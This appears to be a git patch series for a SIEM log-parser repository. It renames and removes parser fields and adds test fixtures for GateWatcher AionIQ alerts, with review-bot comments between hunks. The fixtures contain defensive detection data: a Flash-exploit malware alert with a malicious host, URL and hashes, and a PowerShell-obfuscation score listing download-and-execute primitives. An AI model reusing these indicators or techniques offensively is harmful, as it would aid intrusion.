@@ -178,21 +167,6 @@ stages: action.properties.virus: "{{parsed_event.message.virus}}" action.properties.xdelay: "{{parse_stat_message.msg.tmp_xdelay or parse_event_with_no_stat.msg.xdelay }}" - - set: - event.reason: "{{parse_short_event.msg.event_reason}}" - email.to.address: "{{parse_short_event.msg.email_to.replace('<', '').replace('>', '')}}" - user.email: "{{parse_short_event.msg.email_to.replace('<', '').replace('>', '')}}" - action.properties.delay: "{{parse_short_event.msg.tmp_delay}}" - action.properties.xdelay: "{{parse_short_event.msg.tmp_xdelay}}" - action.properties.mailer: "{{parse_short_event.msg.tmp_mailer}}" - action.properties.priority_level_msg: "{{parse_short_event.msg.tmp_priority_level_msg}}" - action.properties.relay: "{{parse_short_event.msg._destination_ip}}" - action.properties.dsn_version: "{{parse_short_event.msg.tmp_dsn_version}}" - destination.domain: "{{parse_short_event.msg.destination_domain}}" - destination.address: "{{parse_short_event.msg.destination_domain}}" - destination.ip: "{{parse_short_event.msg._destination_ip}}" - filter: "{{parse_short_event.get('msg') != None}}" - - set: action.properties.relay: > {%- if parse_relay_data.msg.destination_domain | length > 0 -%}{{parse_relay_data.msg.destination_domain}}{%- elif parse_relay_data.msg._destination_ip | length > 0-%}{{parse_relay_data.msg._destination_ip}}{%- endif -%} diff --git a/Fortinet/fortimail/tests/short_event.json b/Fortinet/fortimail/tests/short_event.json deleted file mode 100644 index c44f8b41d..000000000 --- a/Fortinet/fortimail/tests/short_event.json +++ /dev/null 
@@ -1,51 +0,0 @@ -{ - "input": { - "message": "to=, delay=00:00:00, xdelay=00:00:00, mailer=esmtp, pri=138084, relay=[1.2.3.4] [1.2.3.4], dsn=2.0.0, stat=Sent ( [InternalId=123456789, Hostname=example] 20226 bytes in 0.127, 154,320 KB/sec Queued mail for delivery)", - "event": { - "created": "2021-04-23T20:02:05.017771Z", - "id": "123" - }, - "log": { - "hostname": "abc" - } - }, - "expected": { - "message": "to=, delay=00:00:00, xdelay=00:00:00, mailer=esmtp, pri=138084, relay=[1.2.3.4] [1.2.3.4], dsn=2.0.0, stat=Sent ( [InternalId=123456789, Hostname=example] 20226 bytes in 0.127, 154,320 KB/sec Queued mail for delivery)", - "event": { - "reason": "Sent ( [InternalId=123456789, Hostname=example] 20226 bytes in 0.127, 154,320 KB/sec Queued mail for delivery)" - }, - "action": { - "properties": { - "delay": "00:00:00", - "dsn_version": "2.0.0", - "mailer": "esmtp", - "priority_level_msg": "138084", - "relay": "1.2.3.4", - "xdelay": "00:00:00" - } - }, - "destination": { - "address": "1.2.3.4", - "ip": "1.2.3.4" - }, - "email": { - "to": { - "address": [ - "john.doe@example.com," - ] - } - }, - "log": { - "hostname": "abc", - "level": "138084," - }, - "related": { - "ip": [ - "1.2.3.4" - ] - }, - "user": { - "email": "john.doe@example.com" - } - } -} \ No newline at end of file From 6e0b80f38060072307ce3bc07b76b831a9f5564c Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Fri, 13 Sep 2024 12:38:50 +0300 Subject: [PATCH 018/317] Remove short message parsing --- Fortinet/fortimail/tests/esmtp.json | 22 +--------------------- 1 file changed, 1 insertion(+), 21 deletions(-) diff --git a/Fortinet/fortimail/tests/esmtp.json b/Fortinet/fortimail/tests/esmtp.json index a6e28d8a2..67195bfb3 100644 --- a/Fortinet/fortimail/tests/esmtp.json +++ b/Fortinet/fortimail/tests/esmtp.json 
@@ -4,23 +4,11 @@ }, "expected": { "message": "to= delay=00:00:06 xdelay=00:00:06 mailer=esmtp pri=165917 relay= [3.4.5.6] dsn=2.0.0 stat=Sent (Ok: queued as 4T9pxY2qZtz2XPBPX)", - "event": { - "reason": "Sent (Ok: queued as 4T9pxY2qZtz2XPBPX)" - }, "action": { "properties": { - "delay": "00:00:06", - "dsn_version": "2.0.0", - "mailer": "esmtp", - "priority_level_msg": "165917", - "relay": "3.4.5.6", - "xdelay": "00:00:06" + "mailer": "esmtp" } }, - "destination": { - "address": "3.4.5.6", - "ip": "3.4.5.6" - }, "email": { "to": { "address": [ @@ -30,14 +18,6 @@ }, "log": { "level": "165917" - }, - "related": { - "ip": [ - "3.4.5.6" - ] - }, - "user": { - "email": "jdoe@example.com" } } } \ No newline at end of file From 4d0a65fc072fddae51fff55d9439b4e380b29348 Mon Sep 17 00:00:00 2001 From: "vladyslav.guriev" Date: Fri, 13 Sep 2024 12:58:40 +0300 Subject: [PATCH 019/317] Fix review comments --- Checkpoint/checkpoint/_meta/fields.yml | 4 ++-- Checkpoint/checkpoint/ingest/parser.yml | 2 +- Checkpoint/checkpoint/tests/CEF_drop_1.json | 8 +++++--- 3 files changed, 8 insertions(+), 6 deletions(-) diff --git a/Checkpoint/checkpoint/_meta/fields.yml b/Checkpoint/checkpoint/_meta/fields.yml index 8c5d0787a..7047bcfd4 100644 --- a/Checkpoint/checkpoint/_meta/fields.yml +++ b/Checkpoint/checkpoint/_meta/fields.yml @@ -143,9 +143,9 @@ action.target: name: action.target type: keyword -action.tcp.flag: +checkpoint.firewall.tcp_flags: description: The control flag of the data flow - name: action.tcp.flag + name: checkpoint.firewall.tcp_flags type: keyword destination.size_in_char: diff --git a/Checkpoint/checkpoint/ingest/parser.yml b/Checkpoint/checkpoint/ingest/parser.yml index 36ba7d7bb..10a545336 100644 --- a/Checkpoint/checkpoint/ingest/parser.yml +++ b/Checkpoint/checkpoint/ingest/parser.yml 
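Review bot: The revised expectation drops `event.reason`, `destination.ip`, `related.ip` and `user.email` for an input that still contains `relay= [3.4.5.6]` and `stat=Sent (Ok: queued as ...)`, so the fixture now documents a loss of extraction rather than verifying a fix, and the commit message ("Remove short message parsing") does not say why the grok was removed. If it misfired on other inputs, that reason belongs in the commit description, ideally with a fixture reproducing the misfire. Also, `"log": {"level": "165917"}` survives in the expected output, and `165917` is the sendmail `pri=` value from the input rather than a log level — that looks like a pre-existing mis-mapping worth a follow-up.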
@@ -168,7 +168,7 @@ stages: url.full: "{{checkpoint.message.request}}" url.original: "{{checkpoint.message.request}}" user_agent.original: "{{checkpoint.message.user_agent}}" - action.tcp.flag: "{{checkpoint.message.get('TCP Flags')}}" + checkpoint.firewall.tcp_flags: "{{checkpoint.message.get('TCP Flags')}}" - translate: dictionary: diff --git a/Checkpoint/checkpoint/tests/CEF_drop_1.json b/Checkpoint/checkpoint/tests/CEF_drop_1.json index 0695322fa..b20e06518 100644 --- a/Checkpoint/checkpoint/tests/CEF_drop_1.json +++ b/Checkpoint/checkpoint/tests/CEF_drop_1.json @@ -18,9 +18,11 @@ "originsicname": "CN=cip-fw-test-1,O=CPSRVP.test.test", "product": "VPN-1 & FireWall-1" }, - "target": "network-traffic", - "tcp": { - "flag": "SYN-ACK" + "target": "network-traffic" + }, + "checkpoint": { + "firewall": { + "tcp_flags": "SYN-ACK" } }, "destination": { From a3d2ce0f11a5c43f968a32a149c6dcf1bc2a22f2 Mon Sep 17 00:00:00 2001 From: Clement Lyonnet Date: Fri, 13 Sep 2024 14:16:50 +0200 Subject: [PATCH 020/317] Correcting fields name --- GateWatcher/aioniq/_meta/fields.yml | 6 +++--- GateWatcher/aioniq/ingest/parser.yml | 2 +- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/GateWatcher/aioniq/_meta/fields.yml b/GateWatcher/aioniq/_meta/fields.yml index d34cd4696..666611c6d 100644 --- a/GateWatcher/aioniq/_meta/fields.yml +++ b/GateWatcher/aioniq/_meta/fields.yml @@ -320,9 +320,9 @@ gatewatcher.smb: name: gatewatcher.smb type: text -gatewatcher.smtp_email: - description: This field is used for smtp alerts - name: gatewatcher.smtp_email +gatewatcher.email: + description: This field represents the email field + name: gatewatcher.email type: text gatewatcher.snmp: diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml index 58f96e058..894264d2b 100644 --- a/GateWatcher/aioniq/ingest/parser.yml +++ b/GateWatcher/aioniq/ingest/parser.yml 
@@ -166,7 +166,7 @@ stages: http.request.method: '{{json_load.message.http.http_method}}' user_agent.original: '{{json_load.message.http.http_user_agent}}' gatewatcher.ftp_data: '{{json_load.message.ftp_data}}' - gatewatcher.smtp_email: '{{json_load.message.email}}' + gatewatcher.email: '{{json_load.message.email}}' http.response.status_code: '{{json_load.message.http.status}}' filter: '' name: set From 1a06dd2262f249ddca20aa7aab586cd169971174 Mon Sep 17 00:00:00 2001 From: Clement Lyonnet Date: Fri, 13 Sep 2024 15:29:56 +0200 Subject: [PATCH 021/317] New tests and new gatewatcher.smtp field --- GateWatcher/aioniq/_meta/fields.yml | 6 ++ GateWatcher/aioniq/tests/codebreaker.json | 14 +++ GateWatcher/aioniq/tests/dga.json | 14 +++ GateWatcher/aioniq/tests/malcore.json | 14 +++ GateWatcher/aioniq/tests/malcore_event.json | 105 -------------------- GateWatcher/aioniq/tests/retrohunt.json | 14 +++ GateWatcher/aioniq/tests/sigflow-alert.json | 14 +++ GateWatcher/aioniq/tests/sigflow-file.json | 14 +++ GateWatcher/aioniq/tests/sigflow-meta.json | 14 +++ 9 files changed, 104 insertions(+), 105 deletions(-) create mode 100644 GateWatcher/aioniq/tests/codebreaker.json create mode 100644 GateWatcher/aioniq/tests/dga.json create mode 100644 GateWatcher/aioniq/tests/malcore.json delete mode 100644 GateWatcher/aioniq/tests/malcore_event.json create mode 100644 GateWatcher/aioniq/tests/retrohunt.json create mode 100644 GateWatcher/aioniq/tests/sigflow-alert.json create mode 100644 GateWatcher/aioniq/tests/sigflow-file.json create mode 100644 GateWatcher/aioniq/tests/sigflow-meta.json diff --git a/GateWatcher/aioniq/_meta/fields.yml b/GateWatcher/aioniq/_meta/fields.yml index 666611c6d..60ddda7ad 100644 --- a/GateWatcher/aioniq/_meta/fields.yml +++ b/GateWatcher/aioniq/_meta/fields.yml 
@@ -325,6 +325,12 @@ gatewatcher.email: name: gatewatcher.email type: text +gatewatcher.smtp: + description: This field represents the smtp field in a network metadata (used in + legacy format log) + name: gatewatcher.smtp + type: text + gatewatcher.snmp: description: This field represents the snmp field in a network metadata (used in legacy format log) diff --git a/GateWatcher/aioniq/tests/codebreaker.json b/GateWatcher/aioniq/tests/codebreaker.json new file mode 100644 index 000000000..606433e7e --- /dev/null +++ b/GateWatcher/aioniq/tests/codebreaker.json 
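Review bot: `gatewatcher.smtp` is declared here but nothing in this patch sets it — the diffstat lists only `fields.yml` and test fixtures, and the parser hunk of the previous patch maps the `email` key to `gatewatcher.email`. If a stage outside this series already writes `gatewatcher.smtp`, this is fine; otherwise the declaration is dead until the parser is updated, and a pointer in the description such as `(populated from the legacy smtp object by the network-metadata stage)` would tie the two together. `type: text` is consistent with the neighbouring `gatewatcher.snmp`.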
@@ -0,0 +1,14 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Gatewatcher AionIQ", + "dialect_uuid": "0825709a-5f76-441e-9dfb-2b5ea6ce551c" + } + }, + "message": "{\"event_type\":\"powershell\",\"scores\":{\"analysis\":1890,\"analysis_detailed\":{\"CharInt\":0,\"InvokeWebRequest\":0,\"FmtStr\":0,\"WebClientInvokation\":0,\"StrReplace\":0,\"StrJoin\":0,\"SetContent\":0,\"StreamWriter\":0,\"SystemIOFile\":0,\"StreamReader\":0,\"InvokeRestMethod\":0,\"AddContent\":0,\"StartBitsTransfer\":0,\"InvokeExpression\":0,\"GetContent\":0,\"StrCat\":370,\"Base64\":1520},\"proba_obfuscated\":1.0},\"timestamp_detected\":\"2023-03-22T10:30:37.145Z\",\"uuid\":\"8906e477-02b5-4ada-abaa-67b2d41f204a\",\"severity\":1,\"type\":\"codebreaker\",\"src_ip\":\"1.1.1.1\",\"state\":\"Exploit\",\"dest_port\":\"35444\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":\"2157601933358692\",\"gcap\":\"gcap-xxxxxxxxxx.domain.local\",\"@timestamp\":\"2023-03-22T10:32:50.269Z\",\"timestamp_analyzed\":\"2023-03-22T10:32:50.269Z\",\"src_port\":\"4242\",\"file_id\":\"03-22-2023T10:32:45_772669089795425e9ad63823ea1e7ac3_gcap-xxxxxxxx.domain.local\",\"sub_type\":\"powershell\",\"SHA256\":\"efc9380fee13f9accf1cbc2f2bb02ae430cf39d4fbfe1d766f65b500b571ca29\",\"MD5\":\"60b656e17bec0a97f5638790c78a3124\",\"@version\":\"1\",\"gcenter\":\"gcenter-xxxxxxxxxx.domain.local\"}" + }, + "expected": { + "message": 
"{\"event_type\":\"powershell\",\"scores\":{\"analysis\":1890,\"analysis_detailed\":{\"CharInt\":0,\"InvokeWebRequest\":0,\"FmtStr\":0,\"WebClientInvokation\":0,\"StrReplace\":0,\"StrJoin\":0,\"SetContent\":0,\"StreamWriter\":0,\"SystemIOFile\":0,\"StreamReader\":0,\"InvokeRestMethod\":0,\"AddContent\":0,\"StartBitsTransfer\":0,\"InvokeExpression\":0,\"GetContent\":0,\"StrCat\":370,\"Base64\":1520},\"proba_obfuscated\":1.0},\"timestamp_detected\":\"2023-03-22T10:30:37.145Z\",\"uuid\":\"8906e477-02b5-4ada-abaa-67b2d41f204a\",\"severity\":1,\"type\":\"codebreaker\",\"src_ip\":\"1.1.1.1\",\"state\":\"Exploit\",\"dest_port\":\"35444\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":\"2157601933358692\",\"gcap\":\"gcap-xxxxxxxxxx.domain.local\",\"@timestamp\":\"2023-03-22T10:32:50.269Z\",\"timestamp_analyzed\":\"2023-03-22T10:32:50.269Z\",\"src_port\":\"4242\",\"file_id\":\"03-22-2023T10:32:45_772669089795425e9ad63823ea1e7ac3_gcap-xxxxxxxx.domain.local\",\"sub_type\":\"powershell\",\"SHA256\":\"efc9380fee13f9accf1cbc2f2bb02ae430cf39d4fbfe1d766f65b500b571ca29\",\"MD5\":\"60b656e17bec0a97f5638790c78a3124\",\"@version\":\"1\",\"gcenter\":\"gcenter-xxxxxxxxxx.domain.local\"}" + } +} \ No newline at end of file diff --git a/GateWatcher/aioniq/tests/dga.json b/GateWatcher/aioniq/tests/dga.json new file mode 100644 index 000000000..5303e1bb5 --- /dev/null +++ b/GateWatcher/aioniq/tests/dga.json 
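Review bot: The `expected` block holds only `message`, identical to the input, so this fixture passes for any parser output and asserts nothing about how a codebreaker alert is normalised — `src_ip`/`dest_ip`, `severity`, `state: "Exploit"` and the `SHA256`/`MD5` hashes are the values a detection engineer would want pinned. I would add whatever ECS fields the parser produces for at least the two addresses, the file hash and the severity, or, if the parser does not yet handle this event type, say so in the fixture name so the gap stays visible. As written, a green test hides the absence of coverage.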
@@ -0,0 +1,14 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Gatewatcher AionIQ", + "dialect_uuid": "0825709a-5f76-441e-9dfb-2b5ea6ce551c" + } + }, + "message": "{\"event_type\":\"dga\",\"domain_name\":\"pgoadcmgqfacj.com\",\"timestamp_detected\":\"2023-03-22T10:25:54.903Z\",\"uuid\":\"4e4b3104-06ba-4277-899e-149a74a0671c\",\"severity\":1,\"type\":\"machine_learning\",\"probability\":0.9999731546766107,\"dest_port\":53,\"gcap\":\"gcap-xxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":729468278572,\"src_ip\":\"1.1.1.1\",\"@timestamp\":\"2023-03-22T10:46:08.487Z\",\"@version\":\"1\",\"matched_event\":\"041b2ed4-a5e0-4814-8bdc-7522b6d5464f\",\"timestamp_analyzed\":\"2023-03-22T10:46:08.487Z\",\"gcenter\":\"gcenter-xxxxxx.domain.local\",\"src_port\":1294}" + }, + "expected": { + "message": "{\"event_type\":\"dga\",\"domain_name\":\"pgoadcmgqfacj.com\",\"timestamp_detected\":\"2023-03-22T10:25:54.903Z\",\"uuid\":\"4e4b3104-06ba-4277-899e-149a74a0671c\",\"severity\":1,\"type\":\"machine_learning\",\"probability\":0.9999731546766107,\"dest_port\":53,\"gcap\":\"gcap-xxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":729468278572,\"src_ip\":\"1.1.1.1\",\"@timestamp\":\"2023-03-22T10:46:08.487Z\",\"@version\":\"1\",\"matched_event\":\"041b2ed4-a5e0-4814-8bdc-7522b6d5464f\",\"timestamp_analyzed\":\"2023-03-22T10:46:08.487Z\",\"gcenter\":\"gcenter-xxxxxx.domain.local\",\"src_port\":1294}" + } +} \ No newline at end of file diff --git a/GateWatcher/aioniq/tests/malcore.json b/GateWatcher/aioniq/tests/malcore.json new file mode 100644 index 000000000..7a6dc8130 --- /dev/null +++ b/GateWatcher/aioniq/tests/malcore.json 
@@ -0,0 +1,14 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Gatewatcher AionIQ", + "dialect_uuid": "0825709a-5f76-441e-9dfb-2b5ea6ce551c" + } + }, + "message": "{\"timestamp\":\"2023-03-22T10:35:22.615360+0000\",\"analyzed_infected\":10,\"detail_threat_found\":\"Infected : Script.SWF.CVE-2014-0515+.C107 (B), Exp.SWF.Angler.D, Script.SWF.CVE-2014-0515+.C107, SWF/Exploit.ExKit.J trojan, Exploit.SWF.Agent.ja, Exploit.Agent.Script.371, Exploit.Swf.Agent.dvtnkm, Script.SWF.CVE-2014-0515++.C118, EXP/FLASH.Pubenush.E.Gen, Exploit.SWF\",\"timestamp_detected\":\"2023-03-22T10:35:22.615Z\",\"uuid\":\"2103a99c-549e-49b7-bbef-68459e6cc44e\",\"severity\":1,\"dest_port\":19609,\"detail_wait_time\":320265,\"host\":\"gcap-xxxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"timestamp_analyzed\":\"2023-03-22T10:53:13.408Z\",\"@timestamp\":\"2023-03-22T10:53:13.408Z\",\"file_type_description\":\"Macromedia Flash Player\",\"fileinfo\":{\"sha256\":\"350836364013549b6a76aab79d57d109df6acc143759e24a952d3ff5d6a76ec4\",\"file_id\":379,\"magic\":\"Macromedia Flash data (compressed), version 
14\",\"tx_id\":1,\"state\":\"CLOSED\",\"filename\":\"/6SuCHKKkf8Sf1aFXJPqD0R6r3oEDCrbwHFm23EU-Af2zwWdHgpn6mEGu5XlxFust\",\"sid\":[1100020],\"stored\":true,\"md5\":\"67ca9a31f220bc7b68f203c07ad668b9\",\"gaps\":false,\"size\":77068},\"analyzed_suspicious\":0,\"analyzers_up\":16,\"app_proto\":\"http\",\"engines_last_update_date\":\"2023-03-08T19:03:00Z\",\"total_found\":\"10/16\",\"file_type\":\"application/x-shockwave-flash\",\"detail_scan_time\":13425,\"processing_time\":333690,\"SHA256\":\"350836364013549b6a76aab79d57d109df6acc143759e24a952d3ff5d6a76ec4\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"analyzed_clean\":5,\"event_type\":\"malware\",\"http\":{\"http_method\":\"GET\",\"http_port\":8080,\"protocol\":\"HTTP/1.1\",\"status\":200,\"hostname\":\"tsevid-synonymi.justdanceatsea.com\",\"url\":\"/6SuCHKKkf8Sf1aFXJPqD0R6r3oEDCrbwHFm23EU-Af2zwWdHgpn6mEGu5XlxFust\",\"length\":77068,\"http_content_type\":\"application/x-shockwave-flash\",\"http_user_agent\":\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)\",\"http_refer\":\"http://tsevid-synonymi.justdanceatsea.com:8080/ndf4xx22ci.php\"},\"type\":\"malcore\",\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"state\":\"Infected\",\"gcap\":\"gcap-xxxxxxxx.domain.local\",\"flow_id\":1910314914537014,\"reporting_token\":\"No GBOX\",\"src_port\":8080,\"analyzed_other\":1,\"engine_id\":{\"4\":{\"id\":\"32f2f45e6d9faf46e6954356a710208d412fac5181f6c641e34cb9956a133684\",\"threat_details\":\"SWF/Exploit.ExKit.J 
trojan\",\"scan_result\":\"INFECTED\"},\"1\":{\"id\":\"054a20c51cbe9d2cc7d6a237d6cd4e08ab1a67e170b371e632995766d3ba81af\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"9\":{\"id\":\"95603b80d80fa3e98b6faf07418a55ed0b035d19209e3ad4f1858f6b46fa070a\",\"threat_details\":\"Script.SWF.CVE-2014-0515++.C118\",\"scan_result\":\"INFECTED\"},\"14\":{\"id\":\"ecc47e2309be9838d6dc2c5157be1a840950e943f5aaca6637afca11516c3eaf\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"8\":{\"id\":\"714eca0a6475fe7d2bf9a24bcae343f657b230ff68acd544b019574f1392de77\",\"threat_details\":\"Exploit.Swf.Agent.dvtnkm\",\"scan_result\":\"INFECTED\"},\"7\":{\"id\":\"527db072abcf877d4bdcd0e9e4ce12c5d769621aa65dd2f7697a3d67de6cc737\",\"threat_details\":\"Exploit.Agent.Script.371\",\"scan_result\":\"INFECTED\"},\"2\":{\"id\":\"0ff95ddb1117d8f36124f6eac406dbbf9f17e3dd89f9bb1bd600f6ad834c25db\",\"threat_details\":\"Exp.SWF.Angler.D\",\"scan_result\":\"INFECTED\"},\"11\":{\"id\":\"ad05e0dc742bcd6251af91bd07ef470c699d5aebbb2055520b07021b14d7380c\",\"threat_details\":\"\",\"scan_result\":\"NOT_SCANNED\"},\"12\":{\"id\":\"af6868a2b87b3388a816e09d2b282629ccf883b763b3691368a27fbd6f6cd51a\",\"threat_details\":\"EXP/FLASH.Pubenush.E.Gen\",\"scan_result\":\"INFECTED\"},\"10\":{\"id\":\"a9b912e461cec506780d8ad8e785cca6b233ad7c72335c262b0a4ab189afa713\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"3\":{\"id\":\"312a189607571ec2c7544636be405f10889e73d061e0ed77ca0eca97a470838d\",\"threat_details\":\"Script.SWF.CVE-2014-0515+.C107\",\"scan_result\":\"INFECTED\"},\"6\":{\"id\":\"4ca73ae4b92fd7ddcda418e6b70ced0481ac2d878c48e61b686d0c9573c331dc\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"13\":{\"id\":\"b14014e40c0e672e050ad9c210a68a5303ce7facabae9eb2ee07ddf97dc0da0e\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"0\":{\"id\":\"038e407ba285f0e01dd30c6e4f77ec19bad5ed3dc866a2904ae6bf46baa14b74\",\"threat_details\":\"Script.SWF.CVE-2014-0515+.C107 
(B)\",\"scan_result\":\"INFECTED\"},\"5\":{\"id\":\"3bfeb615a695c5ebaac5ade948ffae0c3cfec3787d4625e3abb27fa3c2867f53\",\"threat_details\":\"Exploit.SWF.Agent.ja\",\"scan_result\":\"INFECTED\"},\"15\":{\"id\":\"fe665976a02d03734c321007328109ab66823b260a8eea117d2ab49ee9dfd3f1\",\"threat_details\":\"Exploit.SWF\",\"scan_result\":\"INFECTED\"}},\"proto\":\"TCP\",\"code\":1,\"analyzed_error\":0,\"@version\":\"1\",\"magic_details\":\"Macromedia Flash data (compressed), version 14\"}" + }, + "expected": { + "message": "{\"timestamp\":\"2023-03-22T10:35:22.615360+0000\",\"analyzed_infected\":10,\"detail_threat_found\":\"Infected : Script.SWF.CVE-2014-0515+.C107 (B), Exp.SWF.Angler.D, Script.SWF.CVE-2014-0515+.C107, SWF/Exploit.ExKit.J trojan, Exploit.SWF.Agent.ja, Exploit.Agent.Script.371, Exploit.Swf.Agent.dvtnkm, Script.SWF.CVE-2014-0515++.C118, EXP/FLASH.Pubenush.E.Gen, Exploit.SWF\",\"timestamp_detected\":\"2023-03-22T10:35:22.615Z\",\"uuid\":\"2103a99c-549e-49b7-bbef-68459e6cc44e\",\"severity\":1,\"dest_port\":19609,\"detail_wait_time\":320265,\"host\":\"gcap-xxxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"timestamp_analyzed\":\"2023-03-22T10:53:13.408Z\",\"@timestamp\":\"2023-03-22T10:53:13.408Z\",\"file_type_description\":\"Macromedia Flash Player\",\"fileinfo\":{\"sha256\":\"350836364013549b6a76aab79d57d109df6acc143759e24a952d3ff5d6a76ec4\",\"file_id\":379,\"magic\":\"Macromedia Flash data (compressed), version 
14\",\"tx_id\":1,\"state\":\"CLOSED\",\"filename\":\"/6SuCHKKkf8Sf1aFXJPqD0R6r3oEDCrbwHFm23EU-Af2zwWdHgpn6mEGu5XlxFust\",\"sid\":[1100020],\"stored\":true,\"md5\":\"67ca9a31f220bc7b68f203c07ad668b9\",\"gaps\":false,\"size\":77068},\"analyzed_suspicious\":0,\"analyzers_up\":16,\"app_proto\":\"http\",\"engines_last_update_date\":\"2023-03-08T19:03:00Z\",\"total_found\":\"10/16\",\"file_type\":\"application/x-shockwave-flash\",\"detail_scan_time\":13425,\"processing_time\":333690,\"SHA256\":\"350836364013549b6a76aab79d57d109df6acc143759e24a952d3ff5d6a76ec4\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"analyzed_clean\":5,\"event_type\":\"malware\",\"http\":{\"http_method\":\"GET\",\"http_port\":8080,\"protocol\":\"HTTP/1.1\",\"status\":200,\"hostname\":\"tsevid-synonymi.justdanceatsea.com\",\"url\":\"/6SuCHKKkf8Sf1aFXJPqD0R6r3oEDCrbwHFm23EU-Af2zwWdHgpn6mEGu5XlxFust\",\"length\":77068,\"http_content_type\":\"application/x-shockwave-flash\",\"http_user_agent\":\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)\",\"http_refer\":\"http://tsevid-synonymi.justdanceatsea.com:8080/ndf4xx22ci.php\"},\"type\":\"malcore\",\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"state\":\"Infected\",\"gcap\":\"gcap-xxxxxxxx.domain.local\",\"flow_id\":1910314914537014,\"reporting_token\":\"No GBOX\",\"src_port\":8080,\"analyzed_other\":1,\"engine_id\":{\"4\":{\"id\":\"32f2f45e6d9faf46e6954356a710208d412fac5181f6c641e34cb9956a133684\",\"threat_details\":\"SWF/Exploit.ExKit.J 
trojan\",\"scan_result\":\"INFECTED\"},\"1\":{\"id\":\"054a20c51cbe9d2cc7d6a237d6cd4e08ab1a67e170b371e632995766d3ba81af\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"9\":{\"id\":\"95603b80d80fa3e98b6faf07418a55ed0b035d19209e3ad4f1858f6b46fa070a\",\"threat_details\":\"Script.SWF.CVE-2014-0515++.C118\",\"scan_result\":\"INFECTED\"},\"14\":{\"id\":\"ecc47e2309be9838d6dc2c5157be1a840950e943f5aaca6637afca11516c3eaf\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"8\":{\"id\":\"714eca0a6475fe7d2bf9a24bcae343f657b230ff68acd544b019574f1392de77\",\"threat_details\":\"Exploit.Swf.Agent.dvtnkm\",\"scan_result\":\"INFECTED\"},\"7\":{\"id\":\"527db072abcf877d4bdcd0e9e4ce12c5d769621aa65dd2f7697a3d67de6cc737\",\"threat_details\":\"Exploit.Agent.Script.371\",\"scan_result\":\"INFECTED\"},\"2\":{\"id\":\"0ff95ddb1117d8f36124f6eac406dbbf9f17e3dd89f9bb1bd600f6ad834c25db\",\"threat_details\":\"Exp.SWF.Angler.D\",\"scan_result\":\"INFECTED\"},\"11\":{\"id\":\"ad05e0dc742bcd6251af91bd07ef470c699d5aebbb2055520b07021b14d7380c\",\"threat_details\":\"\",\"scan_result\":\"NOT_SCANNED\"},\"12\":{\"id\":\"af6868a2b87b3388a816e09d2b282629ccf883b763b3691368a27fbd6f6cd51a\",\"threat_details\":\"EXP/FLASH.Pubenush.E.Gen\",\"scan_result\":\"INFECTED\"},\"10\":{\"id\":\"a9b912e461cec506780d8ad8e785cca6b233ad7c72335c262b0a4ab189afa713\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"3\":{\"id\":\"312a189607571ec2c7544636be405f10889e73d061e0ed77ca0eca97a470838d\",\"threat_details\":\"Script.SWF.CVE-2014-0515+.C107\",\"scan_result\":\"INFECTED\"},\"6\":{\"id\":\"4ca73ae4b92fd7ddcda418e6b70ced0481ac2d878c48e61b686d0c9573c331dc\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"13\":{\"id\":\"b14014e40c0e672e050ad9c210a68a5303ce7facabae9eb2ee07ddf97dc0da0e\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"0\":{\"id\":\"038e407ba285f0e01dd30c6e4f77ec19bad5ed3dc866a2904ae6bf46baa14b74\",\"threat_details\":\"Script.SWF.CVE-2014-0515+.C107 
(B)\",\"scan_result\":\"INFECTED\"},\"5\":{\"id\":\"3bfeb615a695c5ebaac5ade948ffae0c3cfec3787d4625e3abb27fa3c2867f53\",\"threat_details\":\"Exploit.SWF.Agent.ja\",\"scan_result\":\"INFECTED\"},\"15\":{\"id\":\"fe665976a02d03734c321007328109ab66823b260a8eea117d2ab49ee9dfd3f1\",\"threat_details\":\"Exploit.SWF\",\"scan_result\":\"INFECTED\"}},\"proto\":\"TCP\",\"code\":1,\"analyzed_error\":0,\"@version\":\"1\",\"magic_details\":\"Macromedia Flash data (compressed), version 14\"}" + } +} \ No newline at end of file diff --git a/GateWatcher/aioniq/tests/malcore_event.json b/GateWatcher/aioniq/tests/malcore_event.json deleted file mode 100644 index bbe92dfe5..000000000 --- a/GateWatcher/aioniq/tests/malcore_event.json +++ /dev/null 
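Review bot: This fixture replaces `malcore_event.json`, which per the diffstat carried a 105-line file including a full `expected` object, with one whose `expected` repeats the input `message` and nothing else, so the malcore normalisation — per-engine infected results, `fileinfo.sha256`/`md5`, the HTTP request fields, `src_ip`/`dest_ip` — is no longer checked by any test. If the old expectations were stale, regenerating them against the current parser is preferable to deleting them; at minimum keep the file hash, both addresses and the severity pinned under whatever names the parser uses. A test whose expected output is its input cannot fail on a parser regression.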
